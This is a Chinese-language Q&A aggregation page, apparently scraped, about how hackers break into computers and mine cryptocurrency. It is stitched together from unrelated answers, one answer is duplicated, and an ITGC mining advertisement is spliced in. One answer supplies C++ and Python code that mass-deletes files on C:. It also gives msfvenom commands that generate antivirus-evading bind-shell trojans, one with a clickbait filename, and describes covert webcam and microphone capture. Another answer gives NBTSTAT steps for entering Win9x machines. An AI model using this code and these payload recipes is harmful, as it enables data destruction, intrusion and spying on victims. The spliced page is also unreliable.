電腦挖礦黑客
⑴ 黑客一般用什麼軟體侵入別人的電腦
計算機木馬 一個完整的木馬系統由硬體部分,軟體部分和具體連接部分組成。 (1)硬體部分:建立木馬連接所必須的硬體實體。控制端:對服務端進行遠程式控制制的一方。 服務端:被控制端遠程式控制制的一方。 INTERNET:控制端對服務端進行遠程式控制制,數據傳輸的網路載體。 (2)軟體部分:實現遠程式控制制所必須的軟體程序。控制端程序:控制端用以遠程式控制制服務端的程序。 木馬程序:潛入服務端內部,獲取其操作許可權的程序。 木馬配置程序:設置木馬程序的埠號,觸發條件,木馬名稱等,使其在服務端藏得更隱蔽的程序。 (3)具體連接部分:通過INTERNET在服務端和控制端之間建立一條木馬通道所必須的元素。 控制端IP,服務端IP:即控制端,服務端的網路地址,也是木馬進行數據傳輸的目的地。 控制端埠,木馬埠:即控制端,服務端的數據入口,通過這個入口,數據可直達控制端程序或木馬 程序。 用木馬這種黑客工具進行網路入侵,從過程上看大致可分為六步(具體可見下圖),下面我們就按這六步來詳細闡述木馬的攻擊原理。 一.配置木馬 一般來說一個設計成熟的木馬都有木馬配置程序,從具體的配置內容看,主要是為了實現以下兩方 面功能: (1)木馬偽裝:木馬配置程序為了在服務端盡可能的好的隱藏木馬,會採用多種偽裝手段,如修改圖標 ,捆綁文件,定製埠,自我銷毀等,我們將在「傳播木馬」這一節中詳細介紹。 (2)信息反饋:木馬配置程序將就信息反饋的方式或地址進行設置,如設置信息反饋的郵件地址,IRC號 ,ICQ號等等,具體的我們將在「信息反饋」這一節中詳細介紹。 【二、傳播木馬】 (1)傳播方式: 木馬的傳播方式主要有兩種:一種是通過E-MAIL,控制端將木馬程序以附件的形式夾在郵件中發送出去,收信人只要打開附件系統就會感染木馬;另一種是軟體下載,一些非正規的網站以提供軟體下載為名義,將木馬捆綁在軟體安裝程序上,下載後,只要一運行這些程序,木馬就會自動安裝。 (2)偽裝方式: 鑒於木馬的危害性,很多人對木馬知識還是有一定了解的,這對木馬的傳播起了一定的抑製作用,這 是木馬設計者所不願見到的,因此他們開發了多種功能來偽裝木馬,以達到降低用戶警覺,欺騙用戶的目的。 (一)修改圖標 當你在E-MAIL的附件中看到這個圖標時,是否會認為這是個文本文件呢?但是我不得不告 訴你,這也有可能是個木馬程序,現在 已經有木馬可以將木馬服務端程序的圖標改成HTML,TXT, ZIP等各種文件的圖標,這有相當大的迷 惑性,但是目前提供這種功能的木馬還不多見,並且這種 偽裝也不是無懈可擊的,所以不必整天提心吊膽,疑神疑鬼的。 (二)捆綁文件 這種偽裝手段是將木馬捆綁到一個安裝程序上,當安裝程序運行時,木馬在用戶毫無察覺的情況下,偷偷的進入了系統。至於被捆綁的文件一般是可執行文件(即EXE,COM一類的文件)。 (三)出錯顯示 有一定木馬知識的人都知道,如果打開一個文件,沒有任何反應,這很可能就是個木馬程序,木馬的設計者也意識到了這個缺陷,所以已經有木馬提供了一個叫做出錯顯示的功能。當服務端用戶打開木馬程序時,會彈出一個錯誤提示框(這當然是假的),錯誤內容可自由 定義,大多會定製成 一些諸如「文件已破壞,無法打開的!」之類的信息,當服務端用戶信以 為真時,木馬卻悄悄侵入了系統。 (四)定製埠 (五)自我銷毀 這項功能是為了彌補木馬的一個缺陷。我們知道當服務端用戶打開含有木馬的文件後,木馬會將自己拷貝到WINDOWS的系統文件夾中(C:WINDOWS或C:WINDOWSSYSTEM目錄下),一般來說 原木馬文件 和系統文件夾中的木馬文件的大小是一樣的(捆綁文件的木馬除外),那麼中了木馬 的朋友只要在近來 收到的信件和下載的軟體中找到原木馬文件,然後根據原木馬的大小去系統 文件夾找相同大小的文件, 判斷一下哪個是木馬就行了。而木馬的自我銷毀功能是指安裝完木馬後,原木馬文件將自動銷毀,這樣服務端用戶就很難找到木馬的來源,在沒有查殺木馬的工 具幫助下,就很難刪除木馬了。(六)木馬更名
台式機根本挖不倒,可以試試挖別的啊,我就在挖ITGC,一天可以挖幾十塊錢,
最重要的是ITGC客戶端內置了一鍵挖礦!一鍵挖礦!一鍵挖礦!重要的事情說三遍。對於小白而言,其實挖礦沒那麼難,只要有台電腦、有台手機就可以,今天教你一鍵挖礦!
首先,第一步,我們要先下載ITGC的錢包客戶端,我們可以搜索eppool去礦池可下載專業挖礦工具,目前支持PC的Win、Linux、MacOS的CPU和顯卡挖礦,以及安卓手機挖礦! 第二步,下載官方錢包客戶端,下載安裝後我們啟動ITGC錢包。 第三步,開始挖礦!【挖礦命令】輸入go並回車,即可開啟你的挖礦之旅,就是這么簡單!就是這么神奇!
⑶ 黑客是怎麼入侵別人電腦的
黑客是入侵別人電腦的方法有9種。 1、獲取口令 這又有三種方法:一是通過網路監聽非法得到用戶口令,這類方法有一定的局限性,但危害性極大,監聽者往往能夠獲得其所在網段的所有用戶賬號和口令,對區域網安全威脅巨大;二是在知道用戶的賬號後(如電子郵件@前面的部分)利用一些專門軟體強行破解用戶口令,這種方法不受網段限制,但黑客要有足夠的耐心和時間;三是在獲得一個伺服器上的用戶口令文件(此文件成為Shadow文件)後,用暴力破解程序破解用戶口令,該方法的使用前提是黑客獲得口令的Shadow文件。此方法在所有方法中危害最大,因為它不需要像第二種方法那樣一遍又一遍地嘗試登錄伺服器,而是在本地將加密後的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶密碼,尤其對那些弱智用戶(指口令安全系數極低的用戶,如某用戶賬號為zys,其口令就是zys666、666666、或乾脆就是zys等)更是在短短的一兩分鍾內,甚至幾十秒內就可以將其幹掉。 2、放置特洛伊木馬程序 特洛伊木馬程序可以直接侵入用戶的電腦並進行破壞,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網上直接下載,一旦用戶打開了這些郵件的附件或者執行了這些程序之後,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,並在自己的計算機系統中隱藏一個可以在Windows啟動時悄悄執行的程序。當您連接到網際網路上時,這個程序就會通知黑客,來報告您的IP地址以及預先設定的埠。黑客在收到這些信息後,再利用這個潛伏在其中的程序,就可以任意地修改您的計算機的參數設定、復制文件、窺視你整個硬碟中的內容等,從而達到控制你的計算機的目的。 3、WWW的欺騙技術 在網上用戶可以利用IE等瀏覽器進行各種各樣的WEB站點的訪問,如閱讀新聞組、咨詢產品價格、訂閱報紙、電子商務等。然而一般的用戶恐怕不會想到有這些問題存在:正在訪問的網頁已經被黑客篡改過,網頁上的信息是虛假的!例如黑客將用戶要瀏覽的網頁的URL改寫為指向黑客自己的伺服器,當用戶瀏覽目標網頁的時候,實際上是向黑客伺服器發出請求,那麼黑客就可以達到欺騙的目的了。 4、電子郵件攻擊 電子郵件攻擊主要表現為兩種方式:一是電子郵件轟炸和電子郵件「滾雪球」,也就是通常所說的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發送數以千計、萬計甚至無窮多次的內容相同的垃圾郵件,致使受害人郵箱被「炸」,嚴重者可能會給電子郵件伺服器操作系統帶來危險,甚至癱瘓;二是電子郵件欺騙,攻擊者佯稱自己為系統管理員(郵件地址和系統管理員完全相同),給用戶發送郵件要求用戶修改口令(口令可能為指定字元串)或在貌似正常的附件中載入病毒或其他木馬程序(據筆者所知,某些單位的網路管理員有定期給用戶免費發送防火牆升級程序的義務,這為黑客成功地利用該方法提供了可乘之機),這類欺騙只要用戶提高警惕,一般危害性不是太大。 5、通過一個節點來攻擊其他節點 黑客在突破一台主機後,往往以此主機作為根據地,攻擊其他主機(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。他們可以使用網路監聽方法,嘗試攻破同一網路內的其他主機;也可以通過IP欺騙和主機信任關系,攻擊其他主機。這類攻擊很狡猾,但由於某些技術很難掌握,如IP欺騙,因此較少被黑客使用。 6、網路監聽 網路監聽是主機的一種工作模式,在這種模式下,主機可以接受到本網段在同一條物理通道上傳輸的所有信息,而不管這些信息的發送方和接受方是誰。此時,如果兩台主機進行通信的信息沒有加密,只要使用某些網路監聽工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號在內的信息資料。雖然網路監聽獲得的用戶帳號和口令具有一定的局限性,但監聽者往往能夠獲得其所在網段的所有用戶帳號及口令。 7、尋找系統漏洞 許多系統都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統或應用軟體本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗證漏洞和IE5漏洞等,這些漏洞在補丁未被開發出來之前一般很難防禦黑客的破壞,除非你將網線拔掉;還有一些漏洞是由於系統管理員配置錯誤引起的,如在網路文件系統中,將目錄和文件以可寫的方式調出,將未加Shadow的用戶密碼文件以明碼方式存放在某一目錄下,這都會給黑客帶來可乘之機,應及時加以修正。 8、利用帳號進行攻擊 有的黑客會利用操作系統提供的預設賬戶和密碼進行攻擊,例如許多UNIX主機都有FTP和Guest等預設賬戶(其密碼和賬戶名同名),有的甚至沒有口令。黑客用Unix操作系統提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。這類攻擊只要系統管理員提高警惕,將系統提供的預設賬戶關掉或提醒無口令用戶增加口令一般都能克服。 9、偷取特權 利用各種特洛伊木馬程序、後門程序和黑客自己編寫的導致緩沖區溢出的程序進行攻擊,前者可使黑客非法獲得對用戶機器的完全控制權,後者可使黑客獲得超級用戶的許可權,從而擁有對整個網路的絕對控制權。這種攻擊手段,一旦奏效,危害性極大。
⑷ 黑客是怎樣通過網路入侵電腦的
黑客是入侵別人電腦的方法有9種。
1、獲取口令
這又有三種方法:
一是通過網路監聽非法得到用戶口令,這類方法有一定的局限性,但危害性極大,監聽者往往能夠獲得其所在網段的所有用戶賬號和口令,對區域網安全威脅巨大;二是在知道用戶的賬號後(如電子郵件@前面的部分)利用一些專門軟體強行破解用戶口令,這種方法不受網段限制,但黑客要有足夠的耐心和時間;三是在獲得一個伺服器上的用戶口令文件(此文件成為Shadow文件)後,用暴力破解程序破解用戶口令,該方法的使用前提是黑客獲得口令的Shadow文件。
此方法在所有方法中危害最大,因為它不需要像第二種方法那樣一遍又一遍地嘗試登錄伺服器,而是在本地將加密後的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶密碼,尤其對那些弱智用戶(指口令安全系數極低的用戶,如某用戶賬號為zys,其口令就是zys666、666666、或乾脆就是zys等)更是在短短的一兩分鍾內,甚至幾十秒內就可以將其幹掉。
2、放置特洛伊木馬程序
特洛伊木馬程序可以直接侵入用戶的電腦並進行破壞,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網上直接下載,一旦用戶打開了這些郵件的附件或者執行了這些程序之後,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,並在自己的計算機系統中隱藏一個可以在Windows啟動時悄悄執行的程序。
當您連接到網際網路上時,這個程序就會通知黑客,來報告您的IP地址以及預先設定的埠。黑客在收到這些信息後,再利用這個潛伏在其中的程序,就可以任意地修改您的計算機的參數設定、復制文件、窺視你整個硬碟中的內容等,從而達到控制你的計算機的目的。
3、WWW的欺騙技術
在網上用戶可以利用IE等瀏覽器進行各種各樣的WEB站點的訪問,如閱讀新聞組、咨詢產品價格、訂閱報紙、電子商務等。然而一般的用戶恐怕不會想到有這些問題存在:正在訪問的網頁已經被黑客篡改過,網頁上的信息是虛假的!例如黑客將用戶要瀏覽的網頁的URL改寫為指向黑客自己的伺服器,當用戶瀏覽目標網頁的時候,實際上是向黑客伺服器發出請求,那麼黑客就可以達到欺騙的目的了。
4、電子郵件攻擊
電子郵件攻擊主要表現為兩種方式:
一是電子郵件轟炸和電子郵件「滾雪球」,也就是通常所說的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發送數以千計、萬計甚至無窮多次的內容相同的垃圾郵件,致使受害人郵箱被「炸」,嚴重者可能會給電子郵件伺服器操作系統帶來危險,甚至癱瘓;
二是電子郵件欺騙,攻擊者佯稱自己為系統管理員(郵件地址和系統管理員完全相同),給用戶發送郵件要求用戶修改口令(口令可能為指定字元串)或在貌似正常的附件中載入病毒或其他木馬程序(據筆者所知,某些單位的網路管理員有定期給用戶免費發送防火牆升級程序的義務,這為黑客成功地利用該方法提供了可乘之機),這類欺騙只要用戶提高警惕,一般危害性不是太大。
5、通過一個節點來攻擊其他節點
黑客在突破一台主機後,往往以此主機作為根據地,攻擊其他主機(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。他們可以使用網路監聽方法,嘗試攻破同一網路內的其他主機;也可以通過IP欺騙和主機信任關系,攻擊其他主機。這類攻擊很狡猾,但由於某些技術很難掌握,如IP欺騙,因此較少被黑客使用。
6、網路監聽
網路監聽是主機的一種工作模式,在這種模式下,主機可以接受到本網段在同一條物理通道上傳輸的所有信息,而不管這些信息的發送方和接受方是誰。此時,如果兩台主機進行通信的信息沒有加密,只要使用某些網路監聽工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號在內的信息資料。雖然網路監聽獲得的用戶帳號和口令具有一定的局限性,但監聽者往往能夠獲得其所在網段的所有用戶帳號及口令。
7、尋找系統漏洞
許多系統都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統或應用軟體本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗證漏洞和IE5漏洞等,這些漏洞在補丁未被開發出來之前一般很難防禦黑客的破壞,除非你將網線拔掉;還有一些漏洞是由於系統管理員配置錯誤引起的,如在網路文件系統中,將目錄和文件以可寫的方式調出,將未加Shadow的用戶密碼文件以明碼方式存放在某一目錄下,這都會給黑客帶來可乘之機,應及時加以修正。
8、利用帳號進行攻擊
有的黑客會利用操作系統提供的預設賬戶和密碼進行攻擊,例如許多UNIX主機都有FTP和Guest等預設賬戶(其密碼和賬戶名同名),有的甚至沒有口令。黑客用Unix操作系統提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。這類攻擊只要系統管理員提高警惕,將系統提供的預設賬戶關掉或提醒無口令用戶增加口令一般都能克服。
9、偷取特權
利用各種特洛伊木馬程序、後門程序和黑客自己編寫的導致緩沖區溢出的程序進行攻擊,前者可使黑客非法獲得對用戶機器的完全控制權,後者可使黑客獲得超級用戶的許可權,從而擁有對整個網路的絕對控制權。這種攻擊手段,一旦奏效,危害性極大。
⑸ 電腦上面說的挖礦是什麼意思
挖礦:即比特幣挖礦,是一種利用電腦硬體計算出比特幣的位置並獲取的過程。
⑹ 如何阻止黑客偷偷用你的電腦和手機挖礦
使用封閉系統或者冷門的系統是最簡單粗暴的方法,這在某種程度上是果粉福利。
防止黑客用你的機器挖礦就跟反惡意軟體一樣,別去訪問亂七八糟的網站,別去下載亂七八糟的軟體,別亂插撿來的U盤,裝個殺毒軟體(Windows上自帶的Windows Defender挺不錯可惜太嚴格了),定期查殺病毒,定期檢查異常的進程和文件,如果某個程序招來了UAC,不懂的情況之下盡量選否,別去信什麼「可能會被殺毒軟體誤報」,有條件最好裝個隔離機、影子系統或者直接用Windows系統自帶的Hyper-V創建虛擬機來進行日常工作。
對於安卓手機,安卓6以前的手機不太可能中招,畢竟手機挖礦也需要好硬體。安卓6以後的手機對每個應用的許可權都有管理,只要別去瞎Root,別裝來源不明的應用,盡量從官方市場下載app並盡可能減少不需要的許可權(還可以用「冰箱」「黑域」禁止其它app後台運行)就可以。
對於蘋果和Windows以及其它操作系統的手機,個人認為只要別去瞎越獄,保持系統在最新版本就可以防止大部分app的流氓行為。
⑺ 黑客能侵入我們的普通電腦么如果可以,那麼是通過什麼方式黑入的
可以,當一般高手是不屑干這種事情,一般都是去搞伺服器和網頁,但為了收集肉雞會去做這些個事,一般都是簡單的給你的電腦中木馬。靠病毒類的感染取得電腦的控制許可權。都是批量完成的。其他的低級類的,主要騙你點圖片啊,點網站啊之類的給你中個木馬盜取你的賬號密碼這樣的。
⑻ 黑客怎麼利用對方IP入侵別人的電腦
黑客已經成為一種文化,很多人想成為黑客,他們偶爾學到了幾種小花招,總喜歡拿別人開玩笑,搞些惡作劇。其實黑客的最高境界在於防守,不在於進攻。所謂明槍易躲暗箭難防,要防住他人所有的進攻,肯定需要懂得比對方更多的系統知識,了解更多的系統漏洞,及如何彌補漏洞。 現在滿天都是黑客教程,但真正有用的不多,下面介紹一種WIN9X下的入侵方法: 1.取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。 2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。 3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第一行是對方電腦名稱 第二行是對方電腦所在工作組 第三行是對方電腦的說明。 4.在Windows目錄下有一文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件:XX.XX.XX.XX 電腦名。 5.開DOS窗口鍵入 NBTSTAT -R。 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入。 以上方法請不要亂用,本人對你用上面的方法所惹出的麻煩概不負責,請慎重。 對付上面進攻的最好辦法就是隱藏你的IP地址。
⑼ 幫黑客挖礦是什麼意思
就是你用的游戲,程序或網頁被植入了木馬,用你電腦在後台偷偷挖虛擬幣
發送給黑客,實際就是利用你電腦幫他們辦事
會加大電腦發熱,加速你電腦損耗,多用你家的電,甚至影響程序運行速度,
⑽ 黑客是如何黑掉他人的電腦的
很贊同那位匿名用戶的說法。對於黑客定義,也許是這樣的。但是,我必須再加上一些解釋。
黑客本來不是網路的破壞者,而是專門在網路中查找漏洞的「白帽子」。但是隨著駭客的出現,讓大家改變了對黑客的看法。我們平常所說的黑客,一般都指駭客。而真正的黑客,應該是那些——入侵了你的電腦,卻在默默幫你修復漏洞的人們!
那麼,黑客是如何「黑掉」他人電腦的呢?其實,這一切都十分簡單。
1、駭客:惡意代碼破壞
這是新手最常用的方法,也是駭客最喜歡的。他們通常寫一個Python/CPP腳本:
··· CPP
#include <windows.h>
#include <stdlib.h>
using namespace std;
int main(){
system("del C:*.* /f /s /q");
return 0;
// Exits
}
···CPP
這段代碼運行後(千萬別運行),你的電腦幾乎就廢了……(雖然系統文件可能刪不掉,但你的文檔啥的,難保……)
Python的編寫更加簡單,但是運行速度較緩慢。所以一般利用Python都在攻擊端。
···Python
import os
os.system("del C:*.* /f /s /q")
···
簡單至極,就可以讓你的電腦慘慘。
新手駭客就是這樣,喜歡破壞別人的電腦。這種行為不可取!!
2、黑客/駭客:(Metasploit)入侵計算機
Metasploit是一個很好的惡意代碼框架,但這里的代碼都被各大殺毒軟體商盯得死死。為什麼這么說?因為如果你在Linux Kali下執行msfvenom生成exe文件並拷貝到裝有殺軟(不包括360,360如果在壓縮包里就會提示「壓縮包安全」)的計算機上,會發現……
1秒鍾還沒到,被強制刪除了……
這就是防病毒產品的厲害。但是,人外有人,山外有山,黑客/駭客自然有辦法。
如果是黑客:
msfvenom -p windows/shell_bind_tcp LPORT=1337 -f exe-e x86/shikata_ga_nai -i 10 > testvirus.exe
這個木馬生成後可以有效地進行免殺。這樣黑客就可以獲得控制權。但是放心,黑客不會利用他做壞事。
如果是駭客:
msfvenom -p windows/shell_bind_tcp LPORT=1337 -f exe-e x86/shikata_ga_nai -i 200 > 大獎快點擊.exe
「大獎快點擊」這個文件名就是一種社會工程學的利用方式。駭客就是希望你雙擊它,讓他得到你的控制權。
如果點擊了,你的文件可能就不保了。(當然,看駭客怎麼想)
生成了這么病毒後,黑客/駭客會利用netcat黑客工具連接你。但是當你重啟後,這個病毒便不會再發作。所以,黑客/駭客就會利用額外的代碼修改注冊表,讓病毒開機自啟。
因為網路的回答有限制,所以這里暫時不能說。抱歉。
3、其他解惑
(1) 攻擊者是怎麼做到給我彈出提示框的?
假設就是利用msf實現的入侵,例如shell_bind_tcp,則可以利用以下方式彈出提示框:
``` Command
cd C:Windows
mkdir C:WindowsDownloads #有沒有一股重現威金病毒之感?!?
cd C:WindowsDownloads
echo MsgBox "消息內容" > msg.vbs
msg.vbs
del msg.vbs
```
(2) 攻擊者怎麼能聽到我在說什麼的?還有,他怎麼入侵我的攝像頭的?
簡單至極,他可以利用Shell下載一個Python打包的EXE文件,便可以錄音、攝像了。
錄音、攝像完畢後,會保存一個視頻、錄音文件到指定目錄,攻擊者切換到這個目錄,然後再下載一個惡意程序將這些文件全部上傳到伺服器,即可將你的一言一行全部錄制。
(PS:因為網路……所以……)
(3) 我安裝了安全軟體,攻擊者是不是就無法入侵我的計算機了?
不是的。雖然安全軟體可以防護一些普通的攻擊,但如果攻擊者技術夠高超,則可以利用自己發現的0day或其他漏洞入侵。你應該見到過殺毒軟體的提示吧?他就是在刪除病毒。你想:他不是可以刪么?還要防護什麼病毒? 可惜,殺毒軟體辨識病毒都是靠特徵碼。當一個全新的病毒出現時,萬一你是第一個受害者,殺毒軟體和安全軟體將無力幫助你。
望採納,謝謝!